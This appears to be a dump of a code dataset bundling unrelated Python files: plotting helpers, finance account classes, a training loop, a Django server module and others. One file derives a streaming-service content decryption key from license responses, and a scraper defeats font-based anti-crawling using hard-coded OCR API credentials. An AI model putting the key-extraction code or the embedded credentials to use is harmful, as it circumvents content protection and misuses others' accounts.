ax.spines['bottom'].set_linewidth(2);###设置底部坐标轴的粗细\n ax.spines['left'].set_linewidth(2); ###设置左边坐标轴的粗细\n 
ax.spines['right'].set_linewidth(2); ###设置右边坐标轴的粗细\n ax.spines['top'].set_linewidth(2); ###设置上部坐标轴的粗细\n\n plt.tick_params(direction='in',axis='both',top=True,right=True,labelsize=16,width=3)\n labels = ax.get_xticklabels() + ax.get_yticklabels()\n [label.set_fontname('Times New Roman') for label in labels]\n [label.set_fontsize(16) for label in labels] #刻度值字号\n\n fontt = {'family':'Times New Roman','style':'normal','size':22}\n if title != '':\n plt.suptitle(title, fontproperties=fontt, )\n\n #plt.tight_layout(pad=2, h_pad=1, w_pad=1)# 使得图像的四周边缘空白最小化\n out_fig = plt.gcf()\n # out_fig.savefig(os.path.join(savepath, f\"lr{basename}.pdf\"))\n out_fig.savefig(os.path.join(savepath, f\"lr{basename}.eps\"))\n #plt.show()\n plt.close()\n return\n\n optimizer = CustomOptimizer(trainable, **kwargs_optimizer)\n optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)\n #optimizer._register_scheduler(warmup_class, **kwargs_warmup)\n\n return optimizer\n\n\n\n# model = net()\n# LR = 0.01\n# opt = make_optimizer(args, model, \"test\" )\n# loss = torch.nn.CrossEntropyLoss()\n\n# lr_list1 = []\n# lr_list2 = []\n# for epoch in range(200):\n# for i in range(20):\n# y = torch.randint(0, 9, (10,10))*1.0\n# opt.zero_grad()\n# out = model(torch.randn(10,1))\n# lss = loss(out, y)\n# # lss = Variable(lss, requires_grad = True)\n# lss.backward()\n# opt.step()\n# opt.schedule()\n# lr_list2.append(opt.get_lr())\n# lr_list1.append(opt.state_dict()['param_groups'][0]['lr'])\n\n# fig, axs = plt.subplots(1,1, figsize=(6,6))\n# axs.plot(range(len(lr_list1)),lr_list1,color = 'r')\n# #plt.plot(range(100),lr_list2,color = 'b')\n# out_fig = plt.gcf()\n# out_fig.savefig(\"/home/jack/snap/11.pdf\")\n# plt.show()\n# plt.close(fig)\n\n\n# from option import args\n# ckp = checkpoint(args)\n# ckp.InittestDir('aaaa')\n# for idx_data, ds in enumerate(args.data_test):\n# for comprate_idx, compressrate in enumerate(args.CompressRateTrain):\n# ckp.InitTestMetric(compressrate, ds)\n# for snr_idx, snr in enumerate( args.SNRtest):\n# ckp.AddTestMetric(compressrate, snr, ds)\n# for i in range(20):\n# metric = torch.tensor([comprate_idx,comprate_idx+snr_idx])\n# ckp.UpdateTestMetric(compressrate, ds,metric)\n# ckp.MeanTestMetric(compressrate, ds,2)\n\n# ckp.PlotTestMetric()\n\n# 使用时:\n\"\"\"\n\nmodel = net()\nLR = 0.01\noptimizer = make_optimizer( args, model, )\n\n\nlr_list1 = []\n\nfor epoch in range(200):\n for X,y in dataloder:\n optimizer.step()\n optimizer.schedule()\n lr_list1.append(optimizer.state_dict()['param_groups'][0]['lr'])\nplt.plot(range(200),lr_list1,color = 'r')\n\nplt.show()\n\n\"\"\"\n","repo_name":"junjiecjj/Python","sub_path":"AdversaryAttack/Optimizer.py","file_name":"Optimizer.py","file_ext":"py","file_size_in_byte":9137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19979784827","text":"import numpy as np\nimport pandas as pd\n\ndef get_num_periods(compound_on):\n if isinstance(compound_on,int) or compound_on=='MonthEnd':\n N = 12\n else:\n offset = getattr(pd.tseries.offsets,compound_on)\n N = len(pd.date_range('2000-01-01','2000-12-31',freq=offset(1)))\n return N\n\nclass Account(object):\n \"\"\"Account with compounding interest\"\"\"\n def __init__(self, name, balance, interest_rate=0,\n compound_on=1,\n verbose=True):\n \"\"\"\n Parameters\n ----------\n name : str\n Identifier for account\n balance : float\n Starting balance\n interest_rate : float\n Fixed interest rate [%]\n compound_on : int or str\n Integer day of month or pandas 
timeseries offset string\n (e.g., \"MonthEnd\")--see `pandas.tseries.offsets`\n \"\"\"\n self.name = name\n self.init_balance = balance\n assert interest_rate >= 0, 'Interest rate [%] should be >= 0.0'\n self.interest_rate = interest_rate\n try:\n self.compound_on_day = int(compound_on)\n except ValueError:\n self.compound_offset = getattr(pd.tseries.offsets, compound_on)\n self.compound_on_day = None\n self.verbose = verbose # DEBUG\n\n def __str__(self):\n return f'{self.name} ({self.__class__.__name__})'\n\n def init(self,tseries):\n self.last_update = tseries[0]\n self.df = pd.DataFrame(index=tseries,\n columns=['balance','deposit_from','withdrawal_to'])\n self.df.loc[tseries[0],'balance'] = self.init_balance\n\n def update(self,date):\n if self.interest_rate == 0:\n return\n compound_interest = False\n if self.compound_on_day is None:\n # update based on pandas tseries offset\n target_date = date + self.compound_offset(0)\n if date == target_date:\n compound_interest = True\n elif date.day == self.compound_on_day:\n # update based on integer day\n compound_interest = True\n if compound_interest:\n current_balance = self.df.loc[self.last_update,'balance']\n self.df.loc[date,'balance'] = current_balance*(1+self.interest_rate/100)\n if self.verbose:\n print(date,'update balance of',self.name)\n self.last_update = date\n\n def deposit(self,date,amount,from_acct):\n current_balance = self.df.loc[self.last_update,'balance']\n self.df.loc[date,'balance'] = current_balance + amount\n if isinstance(from_acct,str):\n from_acct_name = from_acct\n else:\n from_acct_name = from_acct.name\n if pd.isna(self.df.loc[date,'deposit_from']):\n self.df.loc[date,'deposit_from'] = from_acct_name\n else:\n self.df.loc[date,'deposit_from'] += ',' + from_acct_name\n self.last_update = date \n\n def withdraw(self,date,amount,to_acct):\n current_balance = self.df.loc[self.last_update,'balance']\n self.df.loc[date,'balance'] = current_balance - amount\n if isinstance(to_acct,str):\n to_acct_name = to_acct\n else:\n to_acct_name = to_acct.name\n if pd.isna(self.df.loc[date,'withdrawal_to']):\n self.df.loc[date,'withdrawal_to'] = to_acct_name\n else:\n self.df.loc[date,'withdrawal_to'] += ',' + to_acct_name\n self.last_update = date \n\n def finalize(self):\n self.df = self.df.dropna(how='all')\n\n\nclass Savings(Account):\n def __init__(self,name,balance,APY,compound_on=1):\n \"\"\"\n Parameters\n ----------\n name : str\n Identifier for account\n balance : float\n Starting balance\n APY : float\n Annual percentage yield [%]\n compound_on : int or str\n Integer day of month or pandas timeseries offset string\n (e.g., \"MonthEnd\")--see `pandas.tseries.offsets`\n \"\"\"\n N = get_num_periods(compound_on)\n interest_rate = 100 * ((1+APY/100)**(1.0/N) - 1)\n super().__init__(name,balance,interest_rate,compound_on)\n if self.verbose:\n print('annual periods for APY interest rate:',N)\n print(f'calculated interest rate = {self.interest_rate:g}%')\n\n\nclass Loan(Account):\n \"\"\"Loan with annual percentage rate\"\"\"\n def __init__(self,name,balance,interest_rate,compound_on=1):\n \"\"\"\n Parameters\n ----------\n name : str\n Identifier for account\n balance : float\n Starting balance\n interest_rate : float\n Fixed interest rate [%]\n compound_on : int or str\n Integer day of month or pandas timeseries offset string\n (e.g., \"MonthEnd\")--see `pandas.tseries.offsets`\n \"\"\"\n assert balance < 0, 'debt should have a negative balance'\n N = get_num_periods(compound_on)\n interest_rate_per_period = interest_rate / 
N\n super().__init__(name,balance,interest_rate_per_period,compound_on)\n\n def init(self,tseries):\n self.last_update = tseries[0]\n self.df = pd.DataFrame(index=tseries,\n columns=['principal','interest_paid','interest_due','deposit_from'])\n self.df.loc[tseries[0],'principal'] = self.init_balance\n self.df.loc[tseries[0],'interest_due'] = 0.0\n\n def update(self,date):\n if self.interest_rate == 0:\n return\n compound_interest = False\n if self.compound_on_day is None:\n # update based on pandas tseries offset\n target_date = date + self.compound_offset(0)\n if date == target_date:\n compound_interest = True\n elif date.day == self.compound_on_day:\n # update based on integer day\n compound_interest = True\n if compound_interest:\n current_principal = self.df.loc[self.last_update,'principal']\n self.df.loc[date,'principal'] = current_principal\n self.df.loc[date,'interest_due'] = current_principal*self.interest_rate/100\n if self.verbose:\n print(date,'update interest due for',self.name)\n self.last_update = date\n if self.df.loc[self.last_update,'principal'] >= 0:\n print(date,':',self.name,'paid off!')\n # stop updating\n self.interest_rate = 0\n elif self.df.loc[self.last_update,'principal'] > 0:\n self.df.loc[self.last_update,'principal'] = 0\n if self.verbose:\n print(date,':',self.name,'is already paid off! Zeroing principal')\n \n def deposit(self,date,amount,from_acct):\n \"\"\"A.k.a. make a payment\"\"\"\n current_principal = self.df.loc[self.last_update,'principal']\n current_interest = self.df.loc[self.last_update,'interest_due']\n toward_interest = min(amount,-current_interest)\n toward_principal = amount - toward_interest\n self.df.loc[date,'principal'] = current_principal + toward_principal\n self.df.loc[date,'interest_paid'] = toward_interest\n self.df.loc[date,'interest_due'] = current_interest + toward_interest\n if isinstance(from_acct,str):\n from_acct_name = from_acct\n else:\n from_acct_name = from_acct.name\n if pd.isna(self.df.loc[date,'deposit_from']):\n self.df.loc[date,'deposit_from'] = from_acct_name\n else:\n self.df.loc[date,'deposit_from'] += ',' + from_acct_name\n self.last_update = date\n\n def withdraw(self,date,amount,to_acct):\n raise RuntimeError('Withdrawal from a loan account is not defined')\n\n def finalize(self):\n super().finalize()\n assert np.all(self.df['interest_due'] == 0)\n self.df = self.df.drop(columns='interest_due')\n","repo_name":"ewquon/adulting","sub_path":"financials/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":7915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41115755046","text":"import struct\nimport hmac\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom binascii import unhexlify\n\nimport config\n\ndef get_key_from_id(deviceid, usertoken, session, key_id):\n params = config._MEDIATOKEN_API_PARAMS\n auth_header = {\"Authorization\": \"Bearer \" + usertoken}\n res = session.get(config._MEDIATOKEN_API, params=params, headers=auth_header)\n jsonres = res.json()\n mediatoken = jsonres['token']\n\n res = session.post(config._LICENSE_API, params={\"t\": mediatoken}, json={\"kv\": \"a\", \"lt\": key_id})\n jsonres = res.json()\n cid = jsonres['cid']\n k = jsonres['k']\n\n res = sum([config.STRTABLE.find(k[i]) * (58 ** (len(k) - 1 - i))\n for i in range(len(k))])\n cipherkey = struct.pack('>QQ', res >> 64, res & 0xffffffffffffffff)\n\n h = hmac.new(unhexlify(config.HKEY),\n (cid + deviceid).encode(\"utf-8\"),\n digestmod=hashlib.sha256)\n 
aeskey = h.digest()\n\n aes = AES.new(aeskey, AES.MODE_ECB)\n plainkey = aes.decrypt(cipherkey)\n\n return plainkey","repo_name":"shouko/abmlicense-proxy","sub_path":"abm_license.py","file_name":"abm_license.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36074724796","text":"from pydriller import Repository\nfrom erlport.erlterms import Atom\nimport sys\n\ndef integration_check():\n return Atom(b\"ok\")\n\ndef analyze(repo_url, auth_token):\n try:\n repo = Repository(repo_url.decode())\n return _analyze(repo)\n except:\n return (Atom(b\"error\"), \"Could not analyze repository\".encode())\n\ndef _analyze(repo):\n num_commits = _count_commits(repo)\n user_commits_histogram = _histogram_by_user(repo)\n monthly_commits_histogram = _histogram_by_month(repo)\n return (Atom(b\"ok\"),\n {\n Atom(b\"num_commits\"): num_commits,\n Atom(b\"user_commits_histogram\"): user_commits_histogram,\n Atom(b\"monthly_commits_histogram\"): monthly_commits_histogram\n })\n\ndef _count_commits(repo):\n count = 0\n for commit in repo.traverse_commits():\n count = count + 1\n return count\n\ndef _histogram_by_user(repo):\n histogram = {}\n for commit in repo.traverse_commits():\n author_name = commit.author.name.encode()\n if author_name in histogram:\n histogram[author_name] = histogram[author_name] + 1\n else:\n histogram[author_name] = 1\n return histogram\n\ndef _histogram_by_month(repo):\n histogram = {}\n for commit in repo.traverse_commits():\n year = commit.committer_date.year\n month = commit.committer_date.month\n if (year, month) in histogram:\n histogram[(year, month)] = histogram[(year, month)] + 1\n else:\n histogram[(year, month)] = 1\n return histogram\n","repo_name":"MachinesAreUs/repo_miner_py","sub_path":"lib/python/repo_miner.py","file_name":"repo_miner.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43982754517","text":"import sphinx_rtd_theme\n\nimport jfscripts\n\nhtml_theme = \"sphinx_rtd_theme\"\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\nextensions = []\nextensions += [\"sphinx.ext.autodoc\"]\nextensions += [\"sphinx.ext.intersphinx\"]\nextensions += [\"sphinx.ext.viewcode\"]\nextensions += [\"sphinxarg.ext\"]\n\ntemplates_path = [\"_templates\"]\nsource_suffix = \".rst\"\n\nmaster_doc = \"index\"\n\nproject = \"jfscripts\"\ncopyright = \"2018, Josef Friedrich\"\nauthor = \"Josef Friedrich\"\nversion = jfscripts.__version__\nrelease = jfscripts.__version__\nlanguage = \"en\"\nexclude_patterns = [\"_build\", \"Thumbs.db\", \".DS_Store\"]\npygments_style = \"sphinx\"\ntodo_include_todos = False\nhtml_static_path = []\nhtmlhelp_basename = \"jfscriptsdoc\"\nautodoc_default_flags = [\n \"members\",\n \"undoc-members\",\n \"private-members\",\n \"show-inheritance\",\n]\nintersphinx_mapping = {\"python\": (\"https://docs.python.org/3\", None)}\n","repo_name":"Josef-Friedrich/jfscripts","sub_path":"doc/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14314959627","text":"#!/usr/bin/python3\n\nfrom datetime import datetime\nimport argparse\nimport logging\nimport json\nimport csv\nimport pandas as pd\nfrom mlxtend.frequent_patterns import apriori\nfrom mlxtend.preprocessing import TransactionEncoder\n\nlogger = 
logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\nfh = logging.FileHandler(r'extract_merge_commits_score.log')\n\n# create formatter\nformatter = logging.Formatter('%(asctime)s - %(levelname)s:%(name)s : %(message)s')\nfh.setFormatter(formatter)\n# add formatter to ch\nch.setFormatter(formatter)\n\n# add ch to logger\nlogger.addHandler(ch)\nlogger.addHandler(fh)\n\ndef trans_format(text):\n\treturn text.split(\",\")\n\ndef run_apriori():\n\tdf = pd.read_csv('../input/merge_refactoring_DB_B_simp.csv',sep=',')\n\tdf = df.iloc[:500,:]\n\tdel df['wasted']\n\tdel df['rework']\n\tprint(df.describe)\n\tlist_transactions = []\n\t# creating a list of dataframe columns\n\tcolumns = list(df)\n\tfor i in range(0,len(df)):\n \t\tdata = \"\" \n \t\tfor col_name in columns:\n\t\t\t data += col_name + '=' + str(df[col_name][i]) + ','\n \t\tif data:\n\t\t\t data = data[:-1]\n\t\t\t list_transactions.append(data)\n\tdf_apriori = pd.DataFrame(list_transactions,columns=['Transaction'])\n\n\t#Preparar registros para o Apriori\n\tdf_apriori['Transaction_list'] = df_apriori['Transaction'].apply(trans_format)\n\tte = TransactionEncoder()\n\tte_ary = te.fit(df_apriori['Transaction_list']).transform(df_apriori['Transaction_list'])\n\tte_ary\n\t#Formatando como DataFrame\n\tdf_apriori_rules = pd.DataFrame(te_ary, columns=te.columns_)\n\tprint(df_apriori_rules)\n\t#Rodar o apriori\n\tassociation_rules = apriori(df_apriori_rules, min_support=0.7, use_colnames=True)\n\toutput = pd.DataFrame(association_rules)\n\tprint(output)\n\t# min_confidence=0.2, min_lift=3, min_length=2\n\ndef main():\t\t\n\trun_apriori()\n\t\nif __name__ == '__main__':\n\tmain()","repo_name":"gems-uff/refactoring-merge","sub_path":"src/Auxiliar/apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39307703895","text":"import wandb \nimport torch\nfrom tqdm import tqdm\n\ndef single_epoch_train(\n model, \n train_loader, \n optimizer, \n accelerator=False,\n scheduler=False, \n accumulation_step=4,\n device=\"cuda\"\n ):\n\n total_loss = 0.0\n for idx,batch in tqdm(enumerate(train_loader)):\n\n src_input_ids, src_attention_mask, tgt_input_ids, tgt_attention_mask = (\n batch['src_input_ids'].to(device),\n batch['src_attention_mask'].to(device),\n batch['tgt_input_ids'].to(device),\n batch['tgt_attention_mask'].to(device)\n )\n \n outputs = model(\n input_ids = src_input_ids,\n attention_mask = src_attention_mask,\n labels = tgt_input_ids,\n decoder_attention_mask = tgt_attention_mask\n )\n\n loss = outputs.loss / accumulation_step\n total_loss += loss.detach().float()\n\n accelerator.backward(loss)\n\n #gradient accumulation\n if (idx % accumulation_step == 0) or((idx + 1) == len(train_loader)): \n optimizer.step()\n optimizer.zero_grad()\n\n train_epoch_loss = total_loss / len(train_loader)\n train_ppl = torch.exp(train_epoch_loss)\n wandb.log({\"Train PPL\": train_ppl})\n \ndef single_epoch_test(\n model, \n test_loader, \n device=\"cuda\"\n ):\n\n total_loss = 0.0\n for idx,batch in tqdm(enumerate(test_loader)):\n\n src_input_ids, src_attention_mask, tgt_input_ids, tgt_attention_mask = (\n batch['src_input_ids'].to(device),\n batch['src_attention_mask'].to(device),\n batch['tgt_input_ids'].to(device),\n batch['tgt_attention_mask'].to(device)\n )\n \n outputs = model(\n input_ids = src_input_ids,\n 
attention_mask = src_attention_mask,\n labels = tgt_input_ids,\n decoder_attention_mask = tgt_attention_mask\n )\n\n loss = outputs.loss\n total_loss += loss.detach().float()\n\n test_epoch_loss = total_loss / len(test_loader)\n test_ppl = torch.exp(test_epoch_loss)\n wandb.log({\"Test PPL\": test_ppl})\n","repo_name":"guijinSON/finFlan_T5","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"18796112200","text":"import re\nimport requests\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\nfrom fontTools.ttLib import ttFont\nfrom bs4 import BeautifulSoup as bs\nfont = ttFont.TTFont('font.ttf')\n# print(font.getReverseGlyphMap())\n# print(font.getGlyphNames())\n# print(font.getGlyphOrder())\nbestcmap = font.getBestCmap()\n#{38006: 'glyph00006', 38287: 'glyph00004', 39228: 'glyph00003', 39499: 'glyph00007', 40506: 'glyph00010', 40611: 'glyph00002', 40804: 'glyph00008', 40850: 'glyph00001', 40868: 'glyph00005', 40869: 'glyph00009'}\n#key转换成十六进制,然后0x换成\\\\u, 最后.encode().decode('escape-unicode'),就能在画布上用设置好的字体画出对应的字符\nprint(bestcmap)\nkk = []\nfor k in bestcmap:\n key = hex(k)\n print(key)\n kk.append(str(key).replace('0x','\\\\u').encode().decode('unicode-escape'))\nprint(kk) #['鑶', '閏', '餼', '驋', '鸺', '麣', '齤', '龒', '龤', '龥']\nok_list = ['\\\\u'+str(hex(i))[2:] for i in bestcmap.keys()]\n#创建画布\n# img = Image.new('RGB', (800,800), color=(255,255,255))\n# #创建画笔\n# img_draw = ImageDraw.Draw(img)\n# # 创建字体\n# img_font = ImageFont.truetype('./font.ttf', 60) #字体大小40\n# # 只有10个数字,一行画完\n# line_s = ''.join(kk)\n# print(line_s)\n# img_draw.text((20, 45), line_s, fill=1, font=img_font)\n# img.save('tu11.jpg')\n\"\"\"============================================================\"\"\"\n#识别上面保存的图片里的文字\nfrom aip import AipOcr\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '28067874'\nAPI_KEY = 'l5BmOn6geHb2sw3BhS0nMylL'\nSECRET_KEY = 'hoXHVYoEm7qNoVdqdcIxMrIPUiM0fkRE'\n\nclient = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n# 字体转换到图片时可以尝试几种字体大小(行索引那里,然后测试网页转换的字体正确率怎么样\nwith open('./tu11.jpg', 'rb') as f:\n r = client.basicGeneral(f.read())\nprint(r)\nresult_list = []\nfor item in r['words_result']:\n # print(item) #{'words': '3756480291'}\n result_list.extend(item['words'])\nprint(result_list)\n#和字体文件中的字符创建映射\ndic = dict(zip(ok_list, result_list))\nprint(dic)\n\"\"\"=============================================================================\"\"\"\n#获取网页源代码替换\nurl = 'http://bikongge.com/chapter_1/font_3/index.html'\nresp = requests.get(url)\nresp.encoding = 'utf-8'\npage_source = resp.text\n#替换字符 k是key\nfor k in dic:\n v = dic[k]\n kk = k.replace('\\\\u', '&#x')+';'\n page_source = page_source.replace(kk, v)\nprint(page_source)","repo_name":"konatax/crawler","sub_path":"bikongge/03_字体反爬/提取xml字符形状.py","file_name":"提取xml字符形状.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"6290773105","text":"import asyncio\nimport concurrent.futures\nimport signal\nimport sys\nimport time\nimport traceback\nfrom typing import Callable, Optional\n\nimport pkg_resources # type: ignore\nimport tornado\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.db import connections\nfrom django.db.migrations.executor import MigrationExecutor\n\nfrom hurricane.metrics import (\n RequestCounterMetric,\n ResponseTimeAverageMetric,\n 
StartupTimeMetric,\n registry,\n)\nfrom hurricane.server.django import (\n DjangoHandler,\n DjangoLivenessHandler,\n DjangoReadinessHandler,\n DjangoStartupHandler,\n DjangoStaticFilesHandler,\n PrometheusHandler,\n)\nfrom hurricane.server.loggers import access_log, logger\nfrom hurricane.webhooks import StartupWebhook\nfrom hurricane.webhooks.base import WebhookStatus\n\nEXECUTOR = None\n\n\nclass HurricaneApplication(tornado.web.Application):\n def __init__(self, *args, **kwargs):\n self.collect_metrics = True\n if \"metrics\" in kwargs:\n self.collect_metrics = kwargs[\"metrics\"]\n global EXECUTOR\n if EXECUTOR is None:\n EXECUTOR = concurrent.futures.ThreadPoolExecutor()\n self.executor = EXECUTOR\n super(HurricaneApplication, self).__init__(*args, **kwargs)\n\n def log_request(self, handler: tornado.web.RequestHandler) -> None:\n \"\"\"Writes a completed HTTP request to the logs.\"\"\"\n if handler.get_status() < 400:\n log_method = access_log.info\n elif handler.get_status() < 500:\n log_method = access_log.warning\n else:\n log_method = access_log.error\n request_time = 1000.0 * handler.request.request_time()\n log_method(\n \"%d %s %.2fms\",\n handler.get_status(),\n handler._request_summary(),\n request_time,\n )\n if self.collect_metrics:\n RequestCounterMetric.increment()\n ResponseTimeAverageMetric.add_value(request_time)\n\n\nclass HurricaneProbeApplication(HurricaneApplication):\n def log_request(self, handler: tornado.web.RequestHandler) -> None:\n \"\"\"Writes a completed HTTP probe request to the logs.\"\"\"\n if getattr(settings, \"LOG_PROBES\", False):\n super(HurricaneProbeApplication, self).log_request(handler) # type: ignore\n return\n\n\ndef make_probe_server(options, check_func):\n \"\"\"create probe route application\"\"\"\n handlers = [\n (\n options[\"liveness_probe\"],\n DjangoLivenessHandler,\n {\n \"check_handler\": check_func,\n \"webhook_url\": options[\"webhook_url\"],\n \"max_lifetime\": options[\"max_lifetime\"],\n },\n ),\n (\n options[\"readiness_probe\"],\n DjangoReadinessHandler,\n {\n \"check_handler\": check_func,\n \"req_queue_len\": options[\"req_queue_len\"],\n \"webhook_url\": options[\"webhook_url\"],\n },\n ),\n (options[\"startup_probe\"], DjangoStartupHandler),\n ]\n if with_metrics(options):\n handlers.append((options[\"metrics_path\"], PrometheusHandler))\n return HurricaneProbeApplication(handlers, debug=options[\"debug\"], metrics=False)\n\n\ndef with_metrics(options):\n return \"no_metrics\" not in options or not options[\"no_metrics\"]\n\n\ndef make_http_server(options, check_func, include_probe=False):\n \"\"\"create all routes for this application\"\"\"\n if include_probe:\n handlers = [\n (\n options[\"liveness_probe\"],\n DjangoLivenessHandler,\n {\n \"check_handler\": check_func,\n \"webhook_url\": options[\"webhook_url\"],\n \"max_lifetime\": options[\"max_lifetime\"],\n },\n ),\n (\n options[\"readiness_probe\"],\n DjangoReadinessHandler,\n {\n \"check_handler\": check_func,\n \"req_queue_len\": options[\"req_queue_len\"],\n \"webhook_url\": options[\"webhook_url\"],\n },\n ),\n (options[\"startup_probe\"], DjangoStartupHandler),\n ]\n if with_metrics(options):\n handlers.append((options[\"metrics_path\"], PrometheusHandler))\n else:\n handlers = []\n # if static file serving is enabled\n if options[\"static\"]:\n logger.info(\n f\"Serving static files under {settings.STATIC_URL} from {settings.STATIC_ROOT or ''}\"\n )\n if settings.DEBUG and \"django.contrib.staticfiles\" in settings.INSTALLED_APPS:\n handlers.append(\n (\n 
f\"{settings.STATIC_URL}(.*)\",\n DjangoStaticFilesHandler,\n )\n )\n else:\n handlers.append(\n (\n f\"{settings.STATIC_URL}(.*)\",\n tornado.web.StaticFileHandler,\n {\"path\": settings.STATIC_ROOT},\n )\n )\n # if media file serving is enabled\n if options[\"media\"]:\n logger.info(\n f\"Serving media files under {settings.MEDIA_URL} from {settings.MEDIA_ROOT}\"\n )\n handlers.append(\n (\n f\"{settings.MEDIA_URL}(.*)\",\n tornado.web.StaticFileHandler,\n {\"path\": settings.MEDIA_ROOT},\n )\n )\n\n # append the django routing system\n handlers.append((\".*\", DjangoHandler))\n return HurricaneApplication(\n handlers, debug=options[\"debug\"], metrics=not options.get(\"no_metrics\", False)\n )\n\n\ndef make_http_server_and_listen(\n start_time: float, options: dict, check: Callable, include_probe: bool\n) -> None:\n logger.info(f\"Starting HTTP Server on port {options['port']}\")\n django_application = make_http_server(options, check, include_probe)\n django_application.listen(options[\"port\"])\n StartupWebhook().run(\n url=options[\"webhook_url\"] or None, status=WebhookStatus.SUCCEEDED\n )\n end_time = time.time()\n time_elapsed = end_time - start_time\n # if startup time metric value is set - startup process is finished\n StartupTimeMetric.set(time_elapsed)\n if with_metrics(options):\n hurricane_dist_version = pkg_resources.get_distribution(\n \"django-hurricane\"\n ).version\n registry.metrics[\"hurricane\"].set(\n {\n \"version\": hurricane_dist_version,\n \"startup_time_seconds\": str(round(time_elapsed, 5)),\n \"server_port\": str(options[\"port\"]),\n \"serve_static\": \"true\" if options[\"static\"] else \"false\",\n \"serve_media\": \"true\" if options[\"media\"] else \"false\",\n \"probe_port\": str(options[\"probe_port\"]),\n \"commands\": \",\".join(\n [item for row in options.get(\"command\", []) for item in row]\n if options.get(\"command\")\n else \"\"\n ),\n }\n )\n logger.info(f\"Startup time is {time_elapsed} seconds\")\n\n\ndef command_task(\n commands: list,\n webhook_url: Optional[str] = None,\n loop: Optional[asyncio.unix_events.SelectorEventLoop] = None,\n) -> None:\n logger.info(\"Starting execution of management commands\")\n for command in commands:\n # split a command string to get command options\n command_split = command[0].split()\n logger.info(\n f\"Starting execution of command {command_split[0]} with arguments {command_split[1:]}\"\n )\n start_time_command = time.time()\n # call management command\n try:\n call_command(*command_split)\n except Exception as e:\n logger.error(e)\n error_trace = traceback.format_exc()\n logger.info(\"Webhook with a status failed has been initiated\")\n # webhook is registered and run in a new thread, not blocking the process\n StartupWebhook().run(\n url=webhook_url or None,\n error_trace=error_trace,\n close_loop=True,\n status=WebhookStatus.FAILED,\n loop=loop,\n )\n raise e\n\n end_time_command = time.time()\n\n logger.info(\n f\"Command {command_split[0]} was executed in {end_time_command - start_time_command} seconds\"\n )\n\n\ndef check_databases():\n for db_name in connections:\n connection = connections[db_name]\n cursor = connection.cursor()\n try:\n cursor.execute(\"SELECT (1)\")\n logger.info(\"Database was checked successfully\")\n cursor.close()\n return True\n except Exception as e:\n logger.warning(f\"Database command execution has failed with {e}\")\n cursor.close()\n return False\n\n\ndef count_migrations():\n number_of_migrations = 0\n for db_name in connections:\n connection = connections[db_name]\n if 
hasattr(connection, \"prepare_database\"):\n connection.prepare_database()\n executor = MigrationExecutor(connection)\n targets = executor.loader.graph.leaf_nodes()\n number_of_migrations += len(executor.migration_plan(targets))\n return number_of_migrations\n\n\ndef signal_handler(signal, frame):\n logger.error(\"\\nprogram exiting gracefully\")\n sys.exit(0)\n\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n\ndef check_db_and_migrations(\n webhook_url: Optional[str] = None,\n loop: Optional[asyncio.unix_events.SelectorEventLoop] = None,\n apply_migration: bool = False,\n):\n try:\n while check_databases():\n number_of_migrations = count_migrations()\n\n logger.info(f\"There are {number_of_migrations} pending migrations\")\n if number_of_migrations == 0:\n logger.info(\"No pending migrations\")\n break\n\n if apply_migration:\n logger.info(\"Applying migrations\")\n call_command(\"migrate\")\n\n except Exception as e:\n error_trace = traceback.format_exc()\n logger.info(\"Webhook with a status warning has been initiated\")\n\n StartupWebhook().run(\n url=webhook_url or None,\n error_trace=error_trace,\n close_loop=True,\n status=WebhookStatus.WARNING,\n loop=loop,\n )\n raise e\n\n\ndef sanitize_probes(options):\n # sanitize probe paths\n options[\"liveness_probe\"] = f\"/{options['liveness_probe'].lstrip('/')}\".replace(\n \" \", \"\"\n )\n options[\"readiness_probe\"] = f\"/{options['readiness_probe'].lstrip('/')}\".replace(\n \" \", \"\"\n )\n options[\"startup_probe\"] = f\"/{options['startup_probe'].lstrip('/')}\".replace(\n \" \", \"\"\n )\n\n representations = {\n \"liveness_probe\": options[\"liveness_probe\"],\n \"readiness_probe\": options[\"readiness_probe\"],\n \"startup_probe\": options[\"startup_probe\"],\n }\n # adding optional / to the regular expression of probe handler\n options[\"liveness_probe\"] = add_trailing_slash(options, \"liveness_probe\")\n options[\"readiness_probe\"] = add_trailing_slash(options, \"readiness_probe\")\n options[\"startup_probe\"] = add_trailing_slash(options, \"startup_probe\")\n return options, representations\n\n\ndef add_trailing_slash(options, probe_name):\n # adding optional / to the regular expression of probe handler\n probe = options[probe_name]\n if probe[-1] == \"/\":\n return probe + \"{0,1}\"\n else:\n return probe + \"/{0,1}\"\n\n\ndef static_watch():\n try:\n logger.info(\"Collecting static as static file changed\")\n call_command(\"collectstatic\", interactive=False, clear=True)\n except Exception as e:\n 